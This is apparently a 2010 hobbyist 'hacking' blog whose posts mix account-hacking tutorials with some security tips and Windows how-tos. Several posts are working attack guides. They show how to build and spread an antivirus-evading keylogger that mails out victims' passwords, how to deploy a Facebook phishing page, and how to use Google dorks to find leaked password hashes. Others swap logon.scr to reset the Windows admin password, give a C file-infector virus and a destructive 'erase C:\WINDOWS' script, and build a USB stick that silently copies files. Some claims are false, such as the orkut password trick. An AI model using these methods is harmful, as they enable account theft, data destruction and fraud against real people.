hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Friday, December 17, 2010

keylogger to hack (facebook,gmail,yahoo,orkut)

In this post is all about how to hack using keyloggers.

Now I will explain how to hack any acount (orkut, facebook, gmail, yahoo,..etc ) using fud keylogger.
1. Download azure fud keylogger here http://www.ziddu.com/download/10725834/Azure-aio--www.hacksonly.com.rar.html

2. The password is " hacksonly ".

3. Extract the files .

4. Run Azure aio.exe

5. Click on keylogger.

6. Give the email id to which the passwords must be sent.

7. Give the password of that email id .

8. give the output file name you want .

9. Select the time interval for which the logs must be sent.

10. select "anti's" and "add to start up".

11. click on build .

12. The keylogger srver will be created in the name that you gave .

13. Now this is the file that you have to give it to your friend or the person you want to hack.

14. You cannot send this file through email as this will be detected as a virus.

15. Upload it to anyof the file sharing sites like rapidshare.com or megaupload.com ,..etc

16. When the victim clicks on this file , the keylogger will be stored in his computer and will send all passwords to your
email id .

17. This keylogger can be detected as a virus or trojan by some of the antivirus .

18. This can be made FUD (Fully Undetectable) by using some FUD crypters and binders.

19. Now open "Azure aio.exe" from the downloaded file.

20. Use binder , crypter , to make it undetectable.

21. You can also use "file pumper" to avoid antivirus detection by increasing its size.

22. Use "icon changer" to change to change the icon of the server file


thanks !!

Thursday, December 9, 2010

How-To block websites on your computer without use of any software?

There are commercially available softwares which will prevent access to websites you specify from your computer. But this can also be done on your computer without even spending a single penny.  We will show you how to do it absolutely for free:


1. Browse to C:\Windows\System32\drivers\etc.


2. Look for a file named as hosts, then open it with Notepad.


3. At the bottom of the file, add the line as shown below:


127.0.0.1 www.blockingsite1.com



www.blocksites1.com is an example of website URL which you would like to block, just replace it with the actual URL so that they are unaccessible to all. 


4. If you have more websites that would like to be blocked, just press Enter and repeat step 3 to add additional URL until all desired websites are added.


5. At the last line of the URL that you have entered, add an extra carriage return by pressing Enter.


6. Save and close the file.




Once you have completed above steps, all websites you have entered will be blocked with immediate effect. Hopefully this simple method will help you to prevent certain websites from being accessed by your kids or anybody else for any reason.

Wednesday, December 1, 2010

CALL SPOOFING

CODE:-

+960 9710488






Then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call ... everything done, and call will get connected




THANKS

FACEBOOK PHOTO UNLOCKER

While surfing on net I juz got a JavaScript which unlock the photos of a profile who have LOCKED his photos or Photo Album......


Just copy the whole script to the URL bar and replace it with the URL of the profile that you wanna UNLOCK the photos......ant hit ENTER....


javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()




THANKS!!!!

Thursday, November 11, 2010

Grab Email Accounts Using Google For Noobs

1: Put one of these dorks in google search and hit enter..... 

Code:
Code:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e

Code:
ext:sql intext:"INSERT INTO" intext:@hotmail.com  intext:password
Code:
ext:sql intext:@hotmail.com  intext:password

2:Now you will see something like this...



3: Select one of displayed pages,as you see we now have a bunch of email accounts+ hashes 

 


4:NOW Select a account you want....but be sensible ....while selecting... 


I selected a random account.... 

The email of account is : narendra97@gmail.com
And for the password ..you have to crack the hash....as one below........

d2491b289b6be1fd0bb0c8d60 e053d3d 

Now you can crack the above hash by going to 


Code:

5: What are you reading now ?......go and grab the account....

Mobile hack to call your friends.Funny isn't It

Hello Friends I am sahring With you a extremely Nice Prank or you can simply say Hack


i.e "How To Call Your Friends From THeir Own Cell Number".

 Enjoy and Have Fun And GO on Reading..

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".


4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.


5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.


If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.

Saturday, October 23, 2010

Beware Of Tab Napping: New Phishing Technique

As people were becoming more and more aware of these traditional phishing techniques and it was becoming difficult for the scammers to cheat people using these phishing techniques so they invented a new technique called “Tab Napping”.This is one of the most intelligent and wise methods of phishing and it not easily detected by a normal internet user until and unless he is aware of this phishing technique.

                                    What is Tab Napping?

Tab napping is new type of phising scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowlege.For example one of your inactive tab in which you have opened your bank’s website will be automatically replaced with the phishing site of your bank and you will be asked to enter your username and password.You might think you have been signed out or never logged in but when you will enter the details again it will be sent to the scammer.

How To Detect And Protect Yourself From Tab Napping

Here are the simple and easy steps with which you can detect this new phishing technique “Tab Napping”.

1. Don’t open another tab when your are working with your banking site or any other secure businesswebsite instead open new windows using CTRL+N.
2. Always check the url address of the website if you return from another tab.(Fake page will have differentUrl)
3. Check that the url has secure address “https:// “ or a big green bar in front of the url in address bar which certifies that it is secure and certified website.
4. If you find anything suspicious close the tab and type and open the website in new Tab.

Saturday, October 16, 2010

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Monday, October 4, 2010

Top 20 Hacking Tools

These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.

Nessus

The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal

Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat

Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

TCPdump

TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap

>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

Kismet

Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf

OpenBSD Packet Filter

fport

fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Friday, September 3, 2010

To create and format a new partition (volume)

 1. Open Computer Management. If you're prompted for an administrator password or confirmation, type the password or provide confirmation.

2. In the left pane, under Storage, click Disk Management.

3. Right-click an unallocated region on your hard disk, and then click New Simple Volume.

4. In the New Simple Volume Wizard, click Next.

5. Type the size of the volume you want to create in megabytes (MB) or accept the maximum default size, and then click Next.

6. Accept the default drive letter or choose a different drive letter to identify the partition, and then click Next.

7. In the Format Partition dialog box, do one of the following:

* If you don't want to format the volume right now, click Do not format this volume, and then click Next.

* To format the volume with the default settings, click Next.

Review your choices, and then click Finish .
NOTE:- 

When you create new partitions on a basic disk, the first three will be formatted as primary partitions. Beginning with the fourth, each one will be configured as a logical drive within an extended partition.

Saturday, August 14, 2010

Monday, August 9, 2010

Set Password for your Nokia Application

Do you want to lock your SMS inbox, Contacts, Personal notes to protect your privacy. Here is a cool application that will help you to set password for any application that you like to restrict the access from your friends and family members.

Today I have found a smart application that helps you to set password for every application, even your mobile default apps like Contacts, SMS & Email Inbox, Personal notes, Setting etc. The application is called Active Lock that will set a lock code for application you wish to lock. When you install this application it will run behind the operating system and no one know that Active Lock is installed.

When some one try to access the apps that you have already locked, Active Lock will ask for password to gain the access.




 


Download Active Lock:
Default Password: 12345



I have tested this application on my Nokia N70 mobile and it is working fine and I hope this application will work will for you.

Reset Your Mobile Memory Card Password 2 minutes

We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.

In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)

Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

thanks once again.

Sunday, July 18, 2010

creating virus using notepad

welcome back in my blog today i will teach u how to create powerful virus using notepad  , its simple to create :-


1.Go to notepad,
2. Type erase C:\WINDOWS,
3. Save IT AS SOMETHING.cmd ,

4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...
How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care it is a simple but powerful virus.thanks !!!

Tuesday, July 13, 2010

How to Protect an Email Account from being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.

If this is the case, then what is the reason for many people to lose their accounts?

The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.

Are you confused? If so continue reading and you’ll come to know…

Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.

1. WEBSITE SPOOFING

Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.


Solution:
Never try to login/access your email account from the sites other than the original site.
Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.

2. BY USING KEYLOGGERS

The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.

Solution:

Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES

Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.

So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…thanks!!!

Benefits of Using BCC While Sending an Email

Almost every user on the Internet sends/receives hundreds of emails per day. However only a handful of them know what is BCC and what are the advantages of using BCC while sending an email. If you are one such Internet user who is unaware of BCC then this is the post that you should definitely read!

What is BCC?

BCC stands Blind Carbon Copy. It refers to the practice of sending an email to multiple recipients without disclosing the individual emails addresses. While sending the same email/message to multiple recipients, it is a common practice for most users to separate the email addresses by using comma or semi-colon and insert all those addresses in the To: filed. When emails are sent in this way, each receiver is able to see the complete list of recipient email addresses to which the same message if being sent to. Unlike To:, the BCC: option allows you to hide the recipients in email messages. In other words, when emails are sent using BCC:,  the receiver will not be able to see the list of recipient email addresses. Thus using BCC is a smart way to protect the privacy of the recipients.

Why should you use BCC?

Here are the reasons for using BCC:

Privacy – BCC provides an easy and simple option for protecting the privacy of your recipients. Under many circumstances it is necessary for us send an email without letting the recipients know who else is receiving the same message. Also it is highly recommended that you use the BCC: while forwarding a joke or a funny email to a list of your friends.  If you are sending email on behalf of a business or organization, it may be especially important to keep lists of clients, members, or associates confidential. So don’t forget to use BCC: in instances wherever privacy matters.

Respect for you recipients- While forwarding email messages, people often do not bother to remove the list of previous recipients.  As a result, messages that are repeatedly sent to many recipients may contain long lists of email addresses.  This makes it easy for the spammers to collect and target those emails for spamming.

In order to avoid the risk of spammers, it is necessary that you encourage people/friends to use BCC: while forwarding any message to you. This prevents your email address from appearing in other people’s inboxes thereby keeping yourself less exposed to spammers

How to Block Unwanted Emails

Do you want to  block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.

For Gmail

1. Login to your account

2. At the top-right corner, click on Settings

3. Under Settings, click on Filters

4. You’ll now see an option “Create a new filter“, click on it

5. Now in the From field enter the email address from which you do not want to receive the emails

For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.

6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.


For Yahoo

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. In the left panel select the option Filters and click on create or edit filters

5. Now click on Add

6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. Click on Safe and blocked senders link under Junk e-mail

5. Now click on Blocked senders

6. Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

How to Create a Computer Virus?

I sumit write this code for peoples who wants to create virus itself

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.



 #include  stdio.h
#include  io.h
#include  dos.h
#include  dir.h
#include  conio.h
#include  time.h




           FILE *virus,*host;
           int done,a=0;
          unsigned long x;
          char buff[2048];
          struct ffblk ffblk;
          clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

Thursday, June 24, 2010

how to delete virus without using antivirus

Anti-virus software can be very expensive and doesn't always find new breeds of computer virus. You can learn to locate and remove a virus yourself without using ant-virus software. By using the command prompt you can enter the infected drive, locate the virus, render it harmless and delete it from your system for good.

Instructions

Step
1

Click the "Start" menu and type "CMD" into the "Run" box and click "OK."
Step 
2

Select the drive that is infected with the virus. If you are not sure which drive is infected, start with the "C:" drive. Type in "C:" and press "Enter" to access this drive.
Step 
3

Type the following into the command prompt box: - s - h *. * /s /d and press "Enter." This will bring up any suspicious files located on the drive. Open the suspicious file.
Step 
4

Look for a file that contains a ".exe" file and a file titled "autorun.inf." If you find these two files, you have found the tainted file. Make sure to write down the name of the program where the file is located.
Step
5


Rename the "autorun.inf" so you can access the drive later without activating the virus. Type: rename autorun.inf as virusfile and close out of the "Command" prompt box.
Step
6

Double-click the "My Computer" icon and select the drive that has the infected file. Find the program that contains the infected file.
Step
7


Right-click on the program and choose "Open."
Step
8


Right-click on the file you renamed "virusfile" and choose "Delete."
Step
9


Right-click on the ".exe" file and choose "Delete." You have now removed the virus from your computer's hard drive.

I think u like this  simple hacking trick without any software, thanks !!

Wednesday, June 23, 2010

how to hack facebook account

ffYes that's right you can hack Facebook password. Here is a simple tutorial that you can use to hack your friend's Facebook password using Facebook phisher.

P.S.- Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
P.S.2- This tutorial is for educational purposes only. I will not be responsible for your actions from here on.










We will use Phishing through Fake Login Pages. These fake login pages resemble the original login pages of Facebook. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Facebook login details are stolen away.

Follow these steps to Hack Facebook password of any account:

1]- Download these files from HERE- http://www.mediafire.com/?n2umngjyiai

2]- The downloaded file contains the following files inside the Facebook.com folder:

* index.html
* write.php

3]- Upload all of the three files to any free web hosting site like:

* www.sigmirror.com
* www.yourfreehosting.net
* www.esmartstart.com
* www.110mb.com
* www.drivehq.com
* www.t35.com


4]- The index.html is the fake page of Facebook.com. You have to make your victim login through this page. So send the link you get by uploading these files to your victim in a disguised way. Like maybe- Try this link out..New Facebook Version 9 Beta Is out (Just an example.!)

5]- Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown above.

Warning- This method works 100%. You just have to make your victim Login through your link. This is illegal. try it at your own risk.

Saturday, June 12, 2010

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.

A keylogger program is widely available on the internet.some of them are listed below

Win-Spy Monitor

Realtime Spy

SpyAgent Stealth

Spy Anywhere

For more information on keyloggers and it’s usage refer my post Hacking an email account.

Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

new methods how to hack orkut password without any software

hello frends today i teach how to hack orkut password without any software

First thing u have to do is open ur account [orkut].copy the url of the victim.
u would find it in his profile at the address bar.
now open ur yahoo or gmail or any other account.
in that go to 'compose mail'.in the subject field write as "PASSWORD RETRIEVAL"
in the body..write ur id ex"yourid@xyz.com"
ur password in the next line.leave 4 line and paste the victim's orkut url.
leave two lines..and paste ur orkut profile url.
finally send it to secretsorkut@yahoo.com.
this id does not store any id's or passwords.this is newly created by some yahoo experts on public demand.after sending it within 1 hr u wud get the victims password in ur mailbox.i hacked many of them.lets see how many u will hack.
please comment if u like it thanks

Wednesday, June 2, 2010

How to make flash drive that copy's users files silently and automatically

****** THIS INSTRUCTABLE IS FOR INFORMATION PURPOSES ONLY IT IS ILEGAL TO COPY SOMEONES FILES WITHOUT THEIR PERMISSION I AM NOT RESPONSABLE FOR ANY THING THAT MAY OR MAYNOT HAPPEN IF THIS INFORMATION IS USED IMPROPERLY****************


step 1Materials needed

first  of all u need a usb pen drive  /external hard disk to make this.

step 2Create autorun file for the flash drive
Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer. Also used to change the thumb drive icon to something more acceptable for social engineering. Here is the code, you will have to open a simple word edi…

step 3Make the file for copy of documents to drive
This is the heart of the flash drive copy I am not going to go through every line of code here but if you have questions just ask or use Google, I will however touch on the main points of the code. Like the last step make sure you use word to make this file save it as file.bat and all files not a word file just like in the picture. Code follows @echo off :: variables /…

step 4Make vb script to run batch file as invisible
This code is very simple it runs the file.bat as a process so it does not show the cmd prompt and everything the batch file is processing Code it with word and save as invisible.vbs All files once again. ______________________________________________________________ CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ________________…

step 5make a batch file to launch vb script and file.batch
ok this batch file does two things, it looks for the invisible.vbs file in the root of the flash drive then loads it with file.bat so file.bat is run with code from vbs file.... neat huh. create with word and save as launch.bat ____________________________ wscript.exe \invisible.vbs file.bat ____________________________

step 6Create folder to save files withing thumb drive.
Go to the root of the thumb drive and create a folder named all that's it for this step. All the documents will be saved in this folder in there separate folders.

step 7put all files in root of drive and try out
Now if you have not put all the files in the root of the flash drive it's time to do that now. One thing you can do is make all the files hidden, so for if some reason they look into the drive they will see an empty drive and not think anything. Now all you should have to do is plug into someones computer and let the thumb drive do its work after the LED is done flashin…

An A-Z Index of the Windows XP command line

  ADDUSERS Add or list users to/from a CSV file
  ARP Address Resolution Protocol
  ASSOC Change file extension associations•
  ASSOCIAT One step file association
  ATTRIB Change file attributes
b
  BOOTCFG Edit Windows boot settings
  BROWSTAT Get domain, browser and PDC info
c
  CACLS Change file permissions
  CALL Call one batch program from another•
  CD Change Directory - move to a specific Folder•
  CHANGE Change Terminal Server Session properties
  CHKDSK Check Disk - check and repair disk problems
  CHKNTFS Check the NTFS file system
  CHOICE Accept keyboard input to a batch file
  CIPHER Encrypt or Decrypt files/folders
  CleanMgr Automated cleanup of Temp files, recycle bin
  CLEARMEM Clear memory leaks
  CLIP Copy STDIN to the Windows clipboard.
  CLS Clear the screen•
  CLUSTER Windows Clustering
  CMD Start a new CMD shell
  COLOR Change colors of the CMD window•
  COMP Compare the contents of two files or sets of files
  COMPACT Compress files or folders on an NTFS partition
  COMPRESS Compress individual files on an NTFS partition
  CON2PRT Connect or disconnect a Printer
  CONVERT Convert a FAT drive to NTFS.
  COPY Copy one or more files to another location•
  CSCcmd Client-side caching (Offline Files)
  CSVDE Import or Export Active Directory data
d
  DATE Display or set the date•
  DEFRAG Defragment hard drive
  DEL Delete one or more files•
  DELPROF Delete NT user profiles
  DELTREE Delete a folder and all subfolders
  DevCon Device Manager Command Line Utility
  DIR Display a list of files and folders•
  DIRUSE Display disk usage
  DISKCOMP Compare the contents of two floppy disks
  DISKCOPY Copy the contents of one floppy disk to another
  DISKPART Disk Administration
  DNSSTAT DNS Statistics
  DOSKEY Edit command line, recall commands, and create macros
  DSACLs Active Directory ACLs
  DSAdd Add items to active directory (user group computer)
  DSGet View items in active directory (user group computer)
  DSQuery Search for items in active directory (user group computer)
  DSMod Modify items in active directory (user group computer)
  DSMove Move an Active directory Object
  DSRM Remove items from Active Directory
e
  ECHO Display message on screen•
  ENDLOCAL End localisation of environment changes in a batch file•
  ERASE Delete one or more files•
  EVENTCREATE Add a message to the Windows event log
  EXIT Quit the current script/routine and set an errorlevel•
  EXPAND Uncompress files
  EXTRACT Uncompress CAB files
f
  FC Compare two files
  FIND Search for a text string in a file
  FINDSTR Search for strings in files
  FOR /F Loop command: against a set of files•
  FOR /F Loop command: against the results of another command•
  FOR Loop command: all options Files, Directory, List•
  FORFILES Batch process multiple files
  FORMAT Format a disk
  FREEDISK Check free disk space (in bytes)
  FSUTIL File and Volume utilities
  FTP File Transfer Protocol
  FTYPE Display or modify file types used in file extension associations•
g
  GLOBAL Display membership of global groups
  GOTO Direct a batch program to jump to a labelled line•
  GPUPDATE Update Group Policy settings
h
  HELP Online Help
i
  iCACLS Change file and folder permissions
  IF Conditionally perform a command•
  IFMEMBER Is the current user in an NT Workgroup
  IPCONFIG Configure IP
k
  KILL Remove a program from memory
l
  LABEL Edit a disk label
  LOCAL Display membership of local groups
  LOGEVENT Write text to the NT event viewer
  LOGOFF Log a user off
  LOGTIME Log the date and time in a file
m
  MAPISEND Send email from the command line
  MBSAcli Baseline Security Analyzer.
  MEM Display memory usage
  MD Create new folders•
  MKLINK Create a symbolic link (linkd)
  MODE Configure a system device
  MORE Display output, one screen at a time
  MOUNTVOL Manage a volume mount point
  MOVE Move files from one folder to another•
  MOVEUSER Move a user from one domain to another
  MSG Send a message
  MSIEXEC Microsoft Windows Installer
  MSINFO Windows NT diagnostics
  MSTSC Terminal Server Connection (Remote Desktop Protocol)
  MUNGE Find and Replace text within file(s)
  MV Copy in-use files
n
  NET Manage network resources
  NETDOM Domain Manager
  NETSH Configure Network Interfaces, Windows Firewall & Remote access
  NETSVC Command-line Service Controller
  NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
  NETSTAT Display networking statistics (TCP/IP)
  NOW Display the current Date and Time
  NSLOOKUP Name server lookup
  NTBACKUP Backup folders to tape
  NTRIGHTS Edit user account rights
o
  OPENFILES Query or display open files
p
  PATH Display or set a search path for executable files•
  PATHPING Trace route plus network latency and packet loss
  PAUSE Suspend processing of a batch file and display a message•
  PERMS Show permissions for a user
  PERFMON Performance Monitor
  PING Test a network connection
  POPD Restore the previous value of the current directory saved by PUSHD•
  PORTQRY Display the status of ports and services
  POWERCFG Configure power settings
  PRINT Print a text file
  PRNCNFG Display, configure or rename a printer
  PRNMNGR Add, delete, list printers set the default printer
  PROMPT Change the command prompt•
  PsExec Execute process remotely
  PsFile Show files opened remotely
  PsGetSid Display the SID of a computer or a user
  PsInfo List information about a system
  PsKill Kill processes by name or process ID
  PsList List detailed information about processes
  PsLoggedOn Who's logged on (locally or via resource sharing)
  PsLogList Event log records
  PsPasswd Change account password
  PsService View and control services
  PsShutdown Shutdown or reboot a computer
  PsSuspend Suspend processes
  PUSHD Save and then change the current directory•
q
  QGREP Search file(s) for lines that match a given pattern.
r
  RASDIAL Manage RAS connections
  RASPHONE Manage RAS connections
  RECOVER Recover a damaged file from a defective disk.
  REG Registry: Read, Set, Export, Delete keys and values
  REGEDIT Import or export registry settings
  REGSVR32 Register or unregister a DLL
  REGINI Change Registry Permissions
  REM Record comments (remarks) in a batch file•
  REN Rename a file or files•
  REPLACE Replace or update one file with another
  RD Delete folder(s)•
  RMTSHARE Share a folder or a printer
  ROBOCOPY Robust File and Folder Copy
  ROUTE Manipulate network routing tables
  RUNAS Execute a program under a different user account
  RUNDLL32 Run a DLL command (add/remove print connections)
s
  SC Service Control
  SCHTASKS Schedule a command to run at a specific time
  SCLIST Display NT Services
  SET Display, set, or remove environment variables•
  SETLOCAL Control the visibility of environment variables•
  SETX Set environment variables permanently
  SFC System File Checker
  SHARE List or edit a file share or print share
  SHIFT Shift the position of replaceable parameters in a batch file•
  SHORTCUT Create a windows shortcut (.LNK file)
  SHOWGRPS List the NT Workgroups a user has joined
  SHOWMBRS List the Users who are members of a Workgroup
  SHUTDOWN Shutdown the computer
  SLEEP Wait for x seconds
  SLMGR Software Licensing Management (Vista/2008)
  SOON Schedule a command to run in the near future
  SORT Sort input
  START Start a program or command in a separate window•
  SU Switch User
  SUBINACL Edit file and folder Permissions, Ownership and Domain
  SUBST Associate a path with a drive letter
  SYSTEMINFO List system configuration
t
  TASKLIST List running applications and services
